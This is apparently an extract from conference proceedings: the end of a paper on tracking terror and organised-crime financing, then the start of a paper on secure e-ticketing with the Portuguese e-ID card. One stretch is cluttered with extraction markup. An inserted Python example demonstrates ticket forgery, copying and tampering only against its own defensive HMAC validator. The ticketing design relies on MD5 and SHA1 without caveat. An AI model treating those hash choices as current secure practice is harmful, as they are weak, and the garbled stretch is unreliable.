On the formal level, any discussion must make note of the Brussels-based Society for Worldwide Interbank Financial Telecommunications (SWIFT) network, which transmits the instructions to execute most of the transfers that take place through the Clearing House Interbank Payments System (CHIPS, “...is the premier bank-owned payments system for clearing large value payments. CHIPS is a real-time, final payments system for U.S. dollars that uses bi-lateral and multi-lateral netting for maximum liquidity efficiency. CHIPS is the only large-value system in the world that has the capability of carrying extensive remittance information for commercial payments"; http://www.chips.org/home.php) and a second U.S.-based network, Fedwire (“The Fedwire funds transfer system is a large-dollar electronic payment system owned and operated by the Federal Reserve Bank that transfers funds between financial institutions on behalf of their customers. This service operates similarly to Automated Clearinghouse (ACH). However, depository institutions typically transfer large dollar payments, such as a down payment for a home purchase through Fedwire, and use the ACH for small-dollar payments. The majority of Fedwire transactions are initiated on-line, and all transactions are completed in seconds"; http://www.federalreserveeducation.org/about-the-fed/structure-and-functions/financial-services), which handles almost all U.S. domestic transfers (Shields 2005). In June 2007, Fedwire and CHIPS introduced a new approach to wiring money domestically. The starting point for this change was their customers’ convenience and not necessarily the security dimension. Here, as in many other security related issues, the main conflict is between basic individual civil rights and the right to security (Treasury & Risk 2007).
Clearly, a significant proportion of the funds used directly or indirectly for terror purposes are transmitted through informal channels, though some unknown sums are also channelled through legitimate bank transfers. Unfortunately, tracing illegal funds in the legitimate system, and certainly in the informal hawala system, is not easy, especially when terrorist organizations are involved. Because the amounts involved are not high enough to stand out from the entire body of transactions, it is hard to trace the paper trails of terrorist organizations. U.S. law enforcement agencies suspect that much of al-Qaeda’s funding for 2001 (amounting to $30 million) was transferred through Middle Eastern hawala networks (Freedman 2005). However, as it was broken into small instalments, it is doubtful whether any agency noticed it prior to 9/11. Moreover, according to the 9/11 Commission, the operating expenses for the 9/11 attacks were between $400,000 and $500,000 (Casey 2007). It is difficult to isolate and identify funds financing terrorism from among the enormous number of national and international transactions made daily. Another problem in detecting money transfers for illegal purposes is that the money is often supposedly raised for legitimate religious purposes, and can be labelled as "black" only when put to radical and terrorist uses. This is almost a mirror image of the situation where money raised by organized crime from illegal sources is later laundered. The interface between "white" money of radical organizations turning "black" and "black" O/C money turning "white" is also the meeting point of terrorism and O/C.
3. The main challenges and a possible approach to a partial solution
Unlike other aspects of combating terrorism, when dealing with the financial dimension there is at least one clear and measurable criterion: the amount of money seized from terrorist organizations and personnel. According to this criterion, the rate of success here is rather low, as no significant amounts have ever been reported to have been seized. In some areas, such as Southeast Asia, the effort on the financial level has been assessed as a failure (Abuza 2003), despite other elements in the war on terror being successful. Moreover, the distinction between formal systems and hawala-type systems divides the war on financing terrorism and O/C into two different battlefields.
Recent terrorist activities in a score of liberal and liberalizing nation-states have once again highlighted the need to share intelligence and to create a comprehensive framework to combat terrorism as one means of improving the situation, particularly in the context of terror financing. This network needs to overcome the same difficulties that private organizations, financial institutions, national agencies and countries face when talking to each other about terrorism, as well as the almost impossible demand for intelligence sharing among agencies, even in the same country. Despite the varying conditions between the nations facing terrorist threats, all are confronted by similar methodological stumbling blocks:
- How can terror-related money transactions be verified, and an association with terrorist activities established?
- How can financial institutions cooperate in fighting terrorism? Can combating terrorism overcome commercial competition?
- Is money laundering, a typical O/C offense, becoming the basis for O/C cooperation with terrorist organizations?
- Are differences in privacy and anti-terrorism laws rendering cross-border cooperation impossible?
- Considering the diversity in foreign policies, as well as the varied nature of the terrorist threat in the countries of the free world, is it at all possible to reach at least some basic understanding regarding the goals and strategy of the war on terror?
Several elements have been put together since 9/11, and even before that watershed event, in partial response to some of these issues. None has ever provided a full and comprehensive remedy, since it is impossible to achieve one. However, it is worthwhile to note that the International Money Laundering Abatement and Financial Anti-Terrorism Act of 2001, also known as the 2001 USA Patriot Act Title III, does not recognize any difference between the illegal financial activities of O/C and terrorism, probably due to the numerous criminal deals between these two types of organizations (Hudson 2010).
The issue of bank policies has been handled with the creation of the Financial Action Task Force on Money Laundering (FATF, "The Financial Action Task Force on Money Laundering was established by the G-7 Summit that was held in Paris in 1989 and has today 34 member states. The FATF is an intergovernmental body whose purpose is the development and promotion of policies, both at national and international levels, to combat money laundering and terrorist financing."; http://www.fatf-gafi.org/pages/0,3417,en_32250379_32236836_1_1_1_1_1,00.html) and by national legislation in many countries. The FATF also provides a cross-border system capable of cooperation without compromising state secrets and sensitive intelligence. However, the issue of small transactions evading the early warning systems has not been resolved yet, and there is no solution in sight.
Perhaps, the issue of variation <strong>in</strong> foreign policies and the varied nature of the terrorist threat can be<br />
resolved by def<strong>in</strong><strong>in</strong>g some standardized <strong>in</strong>telligence goals and methods. Indeed, the war aga<strong>in</strong>st terror<br />
necessitates clear, detailed, and timely <strong>in</strong>telligence. All these were basic elements <strong>in</strong> NATO’s battlefield<br />
digitization process, which was <strong>in</strong>troduced <strong>in</strong> the late 1990s. However, <strong>in</strong> those pre-9/11 days, the<br />
process was <strong>in</strong>tended for a somewhat old-fashioned theatre of operations, very much like the Balkans,<br />
for example. Today, data collection and dissem<strong>in</strong>ation are tools not only available to the armed forces.<br />
Other likely consumers today are security services, police forces, and national central banks.<br />
A grow<strong>in</strong>g number of countries have legislation and bodies to combat money launder<strong>in</strong>g. However, they<br />
need to overcome a number of obstacles:<br />
First, no central national/regional/<strong>in</strong>ternational early-warn<strong>in</strong>g system is <strong>in</strong>tegrated with any <strong>in</strong>telligence<br />
service <strong>in</strong> an automated fashion, capable of flagg<strong>in</strong>g suspicious transactions and sett<strong>in</strong>g specific steps <strong>in</strong><br />
motion.<br />
Second, even if national F<strong>in</strong>ancial Intelligence Units (FIUs) operate with<strong>in</strong> a national <strong>in</strong>telligence system,<br />
they may not be open and available to formal f<strong>in</strong>ancial <strong>in</strong>stitutions. Obviously, <strong>in</strong>formal systems are not<br />
subject to any central regulat<strong>in</strong>g body, and constitute a commercial competition to the established banks<br />
and a security threat to governments. Consequently, bank<strong>in</strong>g and national systems only address part of<br />
the issue. Nevertheless, impos<strong>in</strong>g a regulatory and supervisory system will make the transfer of funds<br />
much more difficult for offenders, current or potential. Still, s<strong>in</strong>ce no agreed upon early-warn<strong>in</strong>g system is<br />
available to the banks, it is necessary for an <strong>in</strong>ternational body to devise such an approach, which would<br />
be uniformly used by all banks and be subject to central supervision. Apply<strong>in</strong>g this structure would be a<br />
prerequisite for issu<strong>in</strong>g new, and renew<strong>in</strong>g old, licenses to banks. Employ<strong>in</strong>g this approach would not<br />
compromise any trade secrets, but would enable constant dialogue between banks and law enforcement<br />
agencies. It would also, to some extent, overcome the different rules under which various FIUs operate.<br />
Third, the supervision of formal f<strong>in</strong>ancial <strong>in</strong>stitutions does not <strong>in</strong>clude transactions under a certa<strong>in</strong><br />
m<strong>in</strong>imum (usually $10,000). Thus, no series of small transactions can be identified, if broken along bank<br />
and/or country l<strong>in</strong>es.<br />
The follow<strong>in</strong>g solution addresses the first two problems, but not the third. Whenever relevant money<br />
transactions are <strong>in</strong>volved, two ma<strong>in</strong> players should be considered: the regulators, i.e. the central<br />
governments through their central banks, and the private f<strong>in</strong>ancial <strong>in</strong>stitutions.<br />
Central government and security services operate accord<strong>in</strong>g to laws, regulations and external supervision<br />
through reported and unreported channels. Currently, many countries follow, to a large extent, the<br />
recommendations of the FATF, even if they are not full members. Central government regulations are<br />
34
Alexander Bligh<br />
clearly mandatory, and are always <strong>in</strong> agreement with privacy laws. However, they are never <strong>in</strong> agreement<br />
with the view of the banks that the government is meddl<strong>in</strong>g <strong>in</strong> their bus<strong>in</strong>ess and <strong>in</strong>vad<strong>in</strong>g the privacy of<br />
their customers.<br />
As an alternative to government action, banking institutions recommend setting up private intelligence systems and in-house supervision. Establishing this security net will provide them with better control over intelligence, while keeping trade secrets in-house. Banks also have their own intelligence, which the central regulator does not possess, particularly visual intelligence gathered from surveillance cameras, and financial data and records in which at least one party is typically identified. Much as this information is vital to the end product, the identification of illegal transactions, it tells only one part of the story. The other part is supplied by the central regulator from lists of central clearing bodies.

The only way to maximize the effectiveness of the data is through digital comparison, so that the image of any person entering a bank would be automatically transmitted to a central image bank, kept nationally or internationally (one option is to store it within the SWIFT database). If the image is not of a wanted person, it would be erased and not retained in any central database. Subject to national privacy laws, it would also be possible to add any pertinent data to the database (an account number, for instance).

Before it is possible to adopt one mandatory system, the conflict of interest between the threatened countries and the banks has to be bridged to some extent. A comprehensive solution is probably impossible, since the conflict between the two players is inherent. It is clearly in the interest of the banking institutions to limit the number of suspected and reported transactions, because reporting might curb their profits. As already mentioned, they also aspire to prevent the leaking of business data. However, they usually prefer to operate in agreement with the country's security and privacy requirements. These factors should be considered when developing a new methodological approach.

4. A proposed methodology for developing intelligence

The approach proposed here endeavours to operate along three interwoven dimensions:

Dimension one:
Goal: Reconstruction. Identifying as many elements as possible of the terrorist infrastructure and its operation, from the idea stage up to the execution stage (detonating a bomb, a hijacking, or a suicide bombing that occurred in the past). Accountants should verify post factum terror-oriented transactions.
Characterization of personnel: This comparative study can be carried out by teams of academics, accountants, and terrorism experts.
Methodology: Based on the accumulated experience of foiled terrorist attacks and unfortunate cases that were studied post mortem. The team will also collect data from existing literature and will conduct field research, including interviews with apprehended and convicted terrorists and with anti-terrorism and money laundering experts. This body of evidence will be tabulated, compared, and analyzed, including all early signs which were ignored in the past. This will produce a master matrix for a flow chart of a terrorist event, including the money junctions: when, where, why and how money was used, and for what purposes. The personnel responsible for the monetary dimension would be identified.
End product: The main outcome of this dimension will be a generic model of a terrorist attack, along with its financing methods and early warning signs. Put together, this part may be viewed as the creation of a manual for executing a terrorist action along with its financing, intended to serve all participants, from the supreme leader almost down to the individual terrorist.

Dimension two:
Goal: Assigning responsibilities. The detailed model described above will be followed by a list of law enforcement agencies, government bodies, and banking experts responsible for each operational stage, including the gathering of information and foiling efforts.
Characterization of personnel: Anti-terrorism experts, existing agencies from NATO countries, and political science personnel specializing in public administration, together with legal and financial experts who carefully follow the legality of each of the abovementioned efforts.
Methodology: Collecting data from existing literature and interviews with convicted terrorists and members of governmental agencies in NATO and SWIFT member countries. All anti-terrorism bodies, together with their assigned and actual responsibilities, will be listed, and their current contribution to the effort assessed according to their compatibility with other agencies within NATO. This body of evidence will be compared and combined with the model in Dimension one.
End product: A model for the division of responsibilities, reflecting the current needs of the anti-terrorism and financial agencies, and a model of information-gathering including targets, methods and sources, as well as a dynamic list of information priorities.

Dimension three:
Goal: Providing the legal infrastructure for the anti-terrorism effort and its financial dimension.
Characterization of personnel: Joint teams of legal, banking and anti-terrorism experts will collect all pertinent pieces of legislation, laws and regulations from NATO members and SWIFT countries.
Methodology: The efforts described in dimensions one and two need to be accompanied by legislation relating to civil and human rights in the countries involved. This will provide the legal basis for any action taken, from data collection to the seizure of people and material.
End product: A legal manual for all anti-terrorism elements, detailing the legal environment in which they operate. The manual will elaborate on the steps that can be taken, country-by-country, and the instances in which legal advice is necessary.

Together, these three dimensions will produce a financial anti-terrorism toolbox consisting of:
A terror manual.
An information-gathering model (including responsible bodies, a generic list of essential information, and terminology).
A legal handbook including the breakdown of the legal basis for operations country-by-country.

5. Conclusion

The approach proposed above envisions the establishment, by SWIFT and/or a consortium of other financial institutions, of a 24/7 central clearing house of suspected and pertinent financial data, to be combined with non-financial data supplied by other bodies. The creation of such a body would not resolve the issue of financing terror. However, it would significantly enhance the likelihood that a common language of experts would be found, and some contribution could be made towards fighting the financing of terrorism and O/C. Viewing this method as another layer in countering terrorism may also increase international and inter-agency dialogue and exchange of information without the lingering misgivings that this might compromise national assets.

Acknowledgments

Prof. Bligh of the Ariel University Center, Israel, wishes to thank the Shcusterman family fund and the University of Notre Dame for allowing him the time and resources to carry out this study.
References

Abuza, Z. (2003) "Funding Terrorism in Southeast Asia: The Financial Network of Al Qaeda and Jemaah Islamiya", Contemporary Southeast Asia: A Journal of International & Strategic Affairs, vol. 25, August, pp. 169-199.
Askari, R. (2011) "Non-resident Bangladeshi: The story of the goose that lays golden eggs", The Financial Express (Dhaka), 19 January.
Ballard, M. (2006) "US violated world's privacy with secret SWIFT checks" [online], available at: http://www.theregister.co.uk/2006/09/28/swift_us_privacy_violation
Bligh, A. (2006) "An Analytical Model of Anti-Terror Cross Border Cooperation", in Kempf, W. and Peleg, S. (eds.) Fighting Terrorism in the Liberal State: An Integrated Model of Research, Intelligence and International Law, Volume 9, NATO Security through Science Series: Human and Societal Dynamics, The Netherlands: IOS Press.
Bloodgood, E. and Tremblay-Boire, J. (2011) "International NGOs and National Regulation in an Age of Terrorism", Voluntas: International Journal of Voluntary and Nonprofit Organizations, vol. 22, no. 1, March, pp. 142-173.
Casey, J. (2007) "Dealing with Hawala: informal financial centers in the ethnic community", FBI Law Enforcement Bulletin, no. 2, February, p. 12.
Fair Disclosure Wire (2007) "MoneyGram International 2007 Analyst Day - Final" [online], available at: http://www.accessmylibrary.com/coms2/summary_0286-29974121_ITM
Freedman, M. (2005) "The Invisible Bankers", Forbes, 17 October, pp. 94-104.
Global Finance (2011) "Looking Ahead" [online], available at: http://www.gfmag.com/archives/133/10949-sponsoredroundtable-cash-management.html#axzz1FQmhHwI0
Hudson, R. (2003, revised 2010) "Terrorist and Organized Crime Groups in the Tri-Border Area (TBA) of South America", a report prepared by the Federal Research Division, Library of Congress, under an Interagency Agreement with the Crime and Narcotics Center, Director of Central Intelligence, Washington [online], available at: http://www.loc.gov/rr/frd/pdf-files/TerrOrgCrime_TBA.pdf
Olson, D. (2007) "Financing Terror", FBI Law Enforcement Bulletin, no. 2, February, pp. 1-5.
Razavy, M. (2005) "Hawala: An underground haven for terrorists or social phenomenon?", Crime, Law & Social Change, vol. 44, no. 3, October, pp. 277-299.
Shields, P. (2005) "The 'Information Revolution', Financial Globalization, State Power and Money Laundering", Journal of International Communication, vol. 11, no. 1, pp. 15-39.
Treasury & Risk (2007) "Wired Efficiency", 1 June, pp. 15-16.
A Secure Architecture for Electronic Ticketing Based on the Portuguese e-ID Card

Paul Crocker (1, 2) and Vasco Nicolau (1)
(1) University of Beira Interior, 6201-001 Covilhã, Portugal
(2) Institute of Telecommunications, Covilhã, Portugal
crocker@di.ubi.pt
m2207@ubi.pt

Abstract: The current state of the art for electronic ticketing is based around a mobile concept, where the diverse players involved (clients, payment agents, mobile operators and merchants) often have different and competing needs in terms of technology and, very often, security. In this paper we shall discuss and analyse the security of current electronic ticketing, payment, delivery and authentication systems and show that today's new payment system has the mobile operator as a central player and the mobile phone, given its undisputed role in today's society, as a central agent. We shall then propose and describe a new architecture for electronic ticketing that makes use of the Portuguese national electronic identity (e-ID) card as a fundamental aspect of the security of the ticketing architecture. This architecture is combined with the latest technologies, such as NFC-enabled mobile handsets. We shall describe the potential of our architecture to store electronic tickets, in the form of QR-Codes, in a secure way. We shall also show how the proposed architecture permits flexible authentication scenarios for the eTickets based on the different levels of security which may be required for any given scenario. Scenarios range from low-level, rapid authentication for mass transit systems to the stronger authentication level required for the delivery of high-value items and to the stringent security required at border controls. This flexible and secure authentication is made possible by the cryptographic, PIN-based and biometric authentication available on national e-ID cards, and in particular on the Portuguese national e-ID card.

Keywords: electronic ticketing, identification cards, security, mobile authentication, cryptographic signatures
1. Introduction

The continuing evolution of Information and Communication Technologies (ICTs) has enabled the continuing take-up of eCommerce services and products. The growth in such services has been driven by the Internet; however, new technologies are also driving new products, services and opportunities based around a mobile and ubiquitous concept. The Internet has, however, often been associated with cybercrime, cyberwarfare and general criminal behaviour; in fact the online world is subject to the same security and privacy concerns as the real world, and it is therefore increasingly important to guarantee our security and our privacy in the information society. This is especially true in the context of online electronic sales and transactions for goods and services, with the move away from paper documentation for ticketing, invoicing etc. and towards the increasing use of electronic documentation.

The new ICTs enable the ease, speed and automation of operations that modern society requires. Unfortunately, a consequence of this change has been a sense of unreliability and insecurity on the part of the general public. Taking into account that security is an essential element of any system, we shall propose in detail a new computing architecture for electronic ticketing which covers the entire ticket lifecycle, namely the booking, purchasing, authentication and validation of the tickets. This architecture makes use of national electronic identity (e-ID) cards as a fundamental aspect of the security of the ticketing architecture. Technologies used include Near Field Communication (NFC), the Global System for Mobile communications (GSM), the Quick Response 2-D bar code (QR-Code) format, biometrics and mobile computing, with the overall aim of using the best characteristics of each technology and designing and prototyping a safe, secure, flexible, innovative and commercially viable architecture. One of the principal contributions of this article is the way that the Citizen's electronic Identification (e-ID) Card is integrated into the security layer of the proposed architecture. The main use of the Citizen Card is to strengthen the ticketing system from the viewpoint of personal identification and authentication. A resilient system, associated with the digital identity of citizens throughout the life cycle of tickets, will be described. In order to achieve this we make use of a new middleware for the (Portuguese) Citizen Card that has been developed by the authors (Crocker, de Sousa, & Nicolau, 2010).

The rest of this paper is organized as follows: in section 2 a brief review of the state of the art in eTicketing is given. Section 3 discusses the use of e-ID cards. Section 4 describes in detail the eTicketing architecture, and in section 5 the secure authentication mechanisms at the merchant are explained. This is then followed in section 6 by an analysis of the proposed architecture. The final section presents the conclusions.
2. eTicketing

Today the vast majority of users store personal information, such as notes, calendars, photographs, contacts and even information about credit cards and passwords, on their mobile devices. Given the undoubted importance of the mobile society, this trend will most likely continue, and in the near future the device will also be used to pay for goods and services, to interact with government entities, or even to cast one's vote. As a consequence of this evolution, mobile phones are seen by citizens as indispensable devices, bearers of a personal identity that is in constant mobility, connected and updated with the latest information and services.

Mobile devices are being used to transport tickets, to pay for services using the mobile Internet and to access banking operations. Examples from Portugal are MB-Phone (SIBS 2010) for banking operations and Movensis (Exame Informática 2010) for vending machines. In terms of security there is always the difficult task of remotely authenticating users and providing an adequate level of acceptance and non-repudiation of transactions. This is due largely to the fact that the overwhelming majority of current solutions are based on infrastructures maintained by network operators or financial institutions (Oberthur 2009). Today's payment system consists of several actors, traditionally the banks, the consumers and the merchants. However, the effect of the mobile has been to bring a new player into the system, notably the mobile phone operator, as illustrated below in Fig 1.

Figure 1: Illustration of the new payment system

2.1 Examples of current electronic payment and ticketing systems

Here we describe some typical services.

M-Pesa: a mobile-phone based money transfer service. With M-Pesa and a mobile phone it is possible to transfer money and to pay for purchases from a merchant. Payments are processed via a simple transfer from the balance of the citizen's mobile to a merchant's account via SMS (Hughes, N. and Lonie, S. 2009).

Movensis: the solution consists in the simple use of mobile phones to transfer money from a personal account to the account of the operator of a vending machine (the merchant) in order to obtain a product. The customer first has to access the application on the phone with a PIN, physically identify the serial number of the machine, and then send an SMS with this identification plus the amount to be spent. This process allows the bank to transfer money from the client's account to the merchant's account; in the case of a vending machine, the credit available appears on the machine itself.
Sport Lisboa e Benfica (football ticket): the solution is to buy a ticket for a football game using the club's web site (using a payment agent such as VISA). The client's mobile phone then receives the ticket in the form of a QR-Code with their credentials. The validation stage is simply to validate the QR-Code received when it is read at a terminal at the football stadium.

Portuguese Train Company (CP) (train ticket): at the online site of the merchant the client checks train and seat availability and pre-pays for the trip (using a payment agent, VISA). The customer then receives a clear-text SMS with the ticket on their phone; this is called a "netTicket". On the train, the ticket inspector authenticates the validity of the "netTicket" and the client by simply inspecting the SMS and possibly verifying the ticket (not the holder) using the CP back-office IT system.

2.2 Security concerns

Based on the systems described previously, and others, some general security concerns can be identified:

Difficulties in retrieving the ticket due to theft or loss of the phone or lack of battery power.
The need to enter an application-specific PIN to validate an operation is a concern, principally because people are reluctant to learn more than one PIN and often keep the PIN on (or near) the phone itself.
The ticket is usually stored in clear text on the phone (SMS/QR-Code), so it is a trivial matter for an attacker who obtains it to know where to use it.
The difficulty in ensuring that the holder of the ticket is indeed the rightful owner of the ticket.
Mobile phones are subject to the same types of attacks and vulnerabilities (viruses, trojans, phishing etc.) as traditional computers. Hence one must consider that mobile devices are untrustworthy computing devices (Enisa 2008). One consequence of this is the possibility of (undetected or otherwise) theft of the ticket.
Fraudulent copies of the ticket on the mobile phone are also a concern.
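Three of the concerns just listed (clear-text storage, a holder who may not be the rightful owner, and fraudulent copies) are easier to reason about with a concrete validation check. The following Python program is an example added here; it is not code from the paper nor from any of the systems named above. It assumes a merchant-held secret key and an HMAC-SHA256 over the ticket fields as a stand-in for the public-key signatures an e-ID based design would use, a holder identifier that the validating terminal obtains from the presented credential, and an in-memory set as the merchant's redemption log; the event, seat and holder values are constructed for the demonstration.

```python
import base64
import hashlib
import hmac
import json
import secrets

# Constructed for this example. In a real deployment this would be a
# merchant-side secret; the paper's architecture relies on e-ID/PKI
# signatures instead of a shared MAC key (assumption, not from the paper).
MERCHANT_KEY = b"constructed-merchant-key-for-demo"


def clear_text_ticket(event, seat):
    """The weak design: the ticket exactly as it travels in a clear-text SMS."""
    return "EVENT=%s;SEAT=%s" % (event, seat)


def inspect_clear_text(ticket):
    """What an inspector reading the SMS can check: only that the expected
    fields are present. Nothing binds the text to an issuer or a holder, so an
    edited or copied SMS looks exactly like a genuine one."""
    fields = dict(part.split("=", 1) for part in ticket.split(";"))
    return "EVENT" in fields and "SEAT" in fields


def _mac(key, body):
    return hmac.new(key, body, hashlib.sha256).digest()


def issue_ticket(key, event, seat, holder_id):
    """Hardened design: a JSON body with a random ticket id, bound to the
    holder, plus a MAC over the body. Payload = base64(body).base64(mac)."""
    body = json.dumps(
        {"tid": secrets.token_hex(8), "event": event, "seat": seat,
         "holder": holder_id},
        sort_keys=True, separators=(",", ":")).encode()
    return "%s.%s" % (base64.b64encode(body).decode(),
                      base64.b64encode(_mac(key, body)).decode())


def verify_ticket(key, payload, presented_holder_id, redeemed):
    """Validation at the terminal. Returns (accepted, reason) and records the
    ticket id in `redeemed` on success so that a copy cannot be used again.

    Rejects tampered payloads (bad MAC), a ticket presented by someone other
    than the holder it was issued to, and a second use of the same ticket."""
    try:
        b64_body, b64_mac = payload.split(".", 1)
        body = base64.b64decode(b64_body, validate=True)
        mac = base64.b64decode(b64_mac, validate=True)
    except (ValueError, TypeError):
        return False, "malformed"
    if not hmac.compare_digest(mac, _mac(key, body)):  # constant-time compare
        return False, "bad-mac"
    fields = json.loads(body)
    if fields["holder"] != presented_holder_id:
        return False, "holder-mismatch"
    if fields["tid"] in redeemed:
        return False, "already-redeemed"
    redeemed.add(fields["tid"])
    return True, "ok"


def tamper_seat(payload, new_seat):
    """Attacker edits the seat in an authenticated payload but keeps the old MAC."""
    b64_body, b64_mac = payload.split(".", 1)
    fields = json.loads(base64.b64decode(b64_body))
    fields["seat"] = new_seat
    body = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return "%s.%s" % (base64.b64encode(body).decode(), b64_mac)


def demo():
    """Runs the attacks from the list above against both designs."""
    results = {}
    # Clear-text SMS: editing the seat yields a ticket the inspector accepts.
    forged = clear_text_ticket("IC-511", "1A").replace("SEAT=1A", "SEAT=1B")
    results["clear_text_forgery"] = inspect_clear_text(forged)

    redeemed = set()
    # Event, seat and holder id are constructed values.
    t = issue_ticket(MERCHANT_KEY, "IC-511", "1A", "PT-1234567")
    results["genuine"] = verify_ticket(MERCHANT_KEY, t, "PT-1234567", redeemed)
    results["copy"] = verify_ticket(MERCHANT_KEY, t, "PT-1234567", redeemed)
    results["stolen_phone"] = verify_ticket(MERCHANT_KEY, t, "PT-7654321", set())
    results["tampered"] = verify_ticket(MERCHANT_KEY, tamper_seat(t, "1B"),
                                        "PT-1234567", set())
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

Running it shows why the netTicket-style SMS is weak: a forged clear-text ticket passes inspection, while the authenticated ticket is rejected when its body is altered, when it is presented by a different holder, or when the same copy is presented a second time. An HMAC gives the merchant tamper detection only; the non-repudiation the paper lists as a requirement needs a signature under a key that only the signer holds, which is what the certificates on the e-ID card provide.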
3. e-ID Cards in society
Personal identification documents are undergoing changes all around the world, most notably in the transformation of conventional paper documents to an e-ID format similar to modern electronic credit cards (smart cards). The success of a number of countries in the adoption of e-ID documents is due to various factors, for example the high level of security that such a document offers (resistance to penetration attacks, forgeries etc.). Another important aspect of their success is the ability of e-ID documents to integrate with electronic services and the interoperability between national e-ID cards; see for instance the STORK project to establish European e-ID interoperability (Leenes, R 2009).
Electronic documents are seen as safe, simplify day-to-day life and at the same time reduce the cost of fraud-control operations. National security and defense entities have therefore welcomed their implementation due to the simplification they provide and the services that are offered, such as identity authentication, secure electronic document signing and access to governmental services such as tax. There are also many examples of innovative new services being associated with such cards; two examples are the use of the national e-ID card in the Estonian transport system and the Kids-ID system in Belgium for safe logon to online chat rooms (Eched, Y, Billiaert, E & Veyret E 2009).
3.1 Functionalities of the Portuguese e-ID card
In this section only the key features of the Portuguese Citizen Card (CC) are stated; more details can be found at the e-ID portal (www.cartaodecidadao.pt).
The CC is a Java smart card. The on-card chip contains the citizen's personal information, a private writable information space (1 Kbyte), a biometric fingerprint template, and the cryptographic keys and digital certificates of the Portuguese Justice Ministry Public Key Infrastructure. The relevant information on the card is accessed by Java applets (Rankl 2007) as shown in Fig 2. The card contains three Personal Identification Numbers (PINs), mechanisms for altering the PINs and internal cryptographic processing. It is compatible with multi-channel card readers for authentication and digital signatures (IAS applet), permits the generation of one-time passwords (OTP applet) and executes Match-on-Card (MoC applet) biometric validation of fingerprints.
40
Paul Crocker and Vasco Nicolau
Figure 2: Diagram of applets installed in the Portuguese Citizen Card
The next section describes in detail the proposed architecture for secure ticketing that uses an e-ID card as an integral part. The resulting system is not intended as a competitor to systems developed by large organizations but can be seen as a security layer that could be integrated into existing ticketing systems.
4. Secure eTicketing architecture
In this section the requirements that the security platform should offer are first defined, a brief description of the information flow in the system is given, and the use of the e-ID in the security platform is described.
4.1 Requirements
Based on the security concerns of current electronic payment systems we conclude that, depending on the type of system and its target audience, different forms of validation/authentication of the end user and ticket are required. This requires the security layer to be flexible to the point where it is possible to support different authentication environments. For example, purchasing and subsequently validating a bus ticket is quite different from validating a ticket that permits the pick-up of a newly purchased car. The security level should also be flexible in situations where fraud has been detected and it is necessary to dynamically increase the level of authentication, as was the case at U2 concerts in Coimbra, Portugal (2010) and Boston, USA (2005): there needs to be a mechanism for digitally providing proof that the holder of the ticket is the owner of the ticket and that the ticket is valid.
Three levels of authentication have therefore been defined:
Weak - cases where fast authentication of the ticket (e.g. public transport) is required.
Strong - situations where it is necessary to ensure maximum safety for both the merchant and the client, for instance where it is necessary to authenticate the client as the valid owner of the ticket via his e-ID. Examples of such situations are: receiving high-value goods, receiving prescription drugs at pharmacies, high-risk sporting events where it is necessary to exclude certain individuals, and musical events where ticket fraud must be avoided.
Extra Strong - specific cases where it is necessary to provide additional guarantees beyond the authenticity of the ticket holder's e-ID card (e.g. biometric authentication at airports and borders).
With respect to the information flow between all the players it is desirable to use the best available technologies. QR-Code and NFC technology were chosen for the transport and communication of the electronic tickets, as these technologies are particularly well suited to mobile devices.
Finally, it was decided to make use of a Payment Agent, as this resolves problems concerning payments and is quite a common procedure. The payment agent can of course be any available online payment technology company.
4.2 General overview
The following figure, Fig 3, shows the proposed ticket life cycle. The process starts with the purchase of some good or service via an online web site/shop. The client receives an SMS message with the payment reference (and optionally an email with a copy of the respective data). The client then proceeds to a payment agent (for example PayShop, http://www.payshop.pt/) where the client provides the payment reference information held on his handset via an electronic channel (NFC) or via a simple visual reading. The purchase may in fact be made directly at the payment agent, in which case there is no need to send the SMS with the reservation code to the client.
The payment agent is then responsible for constructing the secure eTicket. This process requires the client to provide his e-ID card and to authenticate himself. After the reference has been paid, the eTicket, a QR-Code, is delivered to the client, either by sending an MMS or directly using NFC. The data is also sent to the Merchant for use in the validation process. Finally, at the Merchant the client will authenticate himself, the merchant will validate the eTicket and authenticate the client, and then deliver the goods/services.
Figure 3: Architecture and life cycle of the secure eTicket
4.2.1 Online website
This is designed as a web portal, Fig 4, with associated services, back office databases, email and a GSM server (for sending SMS messages), all available via web services for maximum flexibility.
Figure 4: WebShop platform
4.2.2 Payment agent
At the payment agent, Fig 5, the client presents the payment reference (the SMS on his handset), using for instance NFC to transmit the reference details to the payment agent, effects payment and in return receives the eTicket. The payment agent needs a card reader (to read the client's e-ID card) and a cryptographic unit for calculating checksums and for digitally signing the ticket. The payment agent also needs access to the Web Services described in the previous section, to access the payment reference details (back office databases) concerning the particular event/service, and also to access the GSM modem in order to send the eTicket via MMS (alternatively the eTicket is transferred from the payment agent to the client using NFC).
Figure 5: Payment agent platform
4.2.3 Merchant
The merchant module, Fig 6, concludes the ticket's life cycle. This is the point where the client receives the goods or services purchased, for instance access to a sporting event, pick-up of goods purchased online at a warehouse or shop, ticket validation on a transit system etc. At this point the Merchant needs to guarantee the authenticity of the eTicket and the validity of the client holding it. In order to have a flexible system not reliant on one particular technology, the proposed solution uses various technologies. To authenticate the client the Merchant obtains the ticket held on the client's phone using, for example, wireless communication, NFC or an optical reading using a bar code reader (or even a simple webcam). The smart card reader is necessary in order to obtain the authentication and/or biometric credentials of the client.
Figure 6: Merchant validation
4.3 Security layer
The proposed architecture is in some cases similar to current ticketing systems; these similarities are most obvious in relation to the information system. However, the proposed architecture interconnects multiple technologies such as NFC, QR-Code and e-ID cards which, in conjunction with the mobile phone, result in an innovative system that is practical, secure and functional, Fig 7. Although at the technological level the system is innovative, what stands out in comparison to all the other systems is the security layer. That is, while similar systems (e.g. public transport ticketing, OTLIS) centralize the security of the system in technology (e.g. RFID cards) or back office systems, the whole security of the system presented here is based on the security credentials of the CC.
Figure 7: Ticket-ID: Secure eTicketing
4.3.1 Security layer
As stated earlier, the payment agent is responsible for constructing the ticket. The exact process of constructing the ticket is illustrated in Fig 8.
Figure 8: The process of eTicket construction
1. In the first step the client at the payment agent presents his reference number, received via SMS and held on his mobile phone (also sent by email). The system then reads this data (via NFC).
2. A ticket in the context of the system is composed of several elements, including the data resulting from the payment and details of the event, as shown below in Fig 9. After constructing this ticket the system applies a cryptographic hash function (MD5). The derived hash is given the name eTicket.
3. The credentials of the personal identity of the citizen are then associated with the eTicket by digitally signing the eTicket. This is done on the e-ID card using (in the Portuguese case) the algorithms SHA1 with RSA [NIST 2009]. The process of signing the eTicket implies that the user enters their digital signature PIN in order to confirm the operation.
